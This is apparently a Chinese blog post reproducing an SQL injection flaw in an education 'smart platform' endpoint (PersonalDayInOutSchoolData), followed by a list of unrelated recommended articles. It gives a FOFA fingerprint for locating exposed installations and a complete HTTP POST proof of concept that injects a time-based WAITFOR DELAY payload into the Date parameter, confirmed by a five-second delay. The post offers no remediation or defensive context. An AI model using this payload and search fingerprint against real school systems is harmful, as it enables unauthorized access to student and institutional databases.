EDU 某智慧平台 PersonalDayInOutSchoolData SQL注入漏洞复现

FOFA:body="custom/blue/uimaker/easyui.css"

PoC

复制代码
POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&AccountNo=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

延时5秒

相关推荐
kishu_iOS&AI2 小时前
Conda 简要说明与常用指令
python·安全·conda
wal13145203 小时前
Dify发布V1.13.1版本,Hologres 向量数据库支持、HITL 邮件 Markdown 渲染及多项安全加固
数据库·安全·dify
陈天伟教授4 小时前
人工智能应用- 预测新冠病毒传染性:04. 中国:强力措施遏制疫情
前端·人工智能·安全·xss·csrf
jxkejiiii5 小时前
巧用手机原生功能,零成本给重要文档加密防护
安全·智能手机
Dola_Zou6 小时前
工业软件安全架构向模块化授权演进的解析
安全·自动化·安全架构·软件加密
互成6 小时前
加密系统哪款最好用?2026年五款加密系统深度对比测评
运维·网络·安全
纽创信安7 小时前
纽创信安与SGS启动网络安全ISO 21434认证项目
网络·安全·web安全
CertiK10 小时前
CertiK实测:Skill扫描并非安全边界
人工智能·安全·openclaw
WZTTMoon10 小时前
从互斥锁到无锁,Java 20年并发安全进化史
java·python·安全
软件供应链安全指南10 小时前
跟随 Gartner 洞察:AIST 从单点能力到全域安全治理的蜕变
大数据·人工智能·安全·gartner·问境aist·aist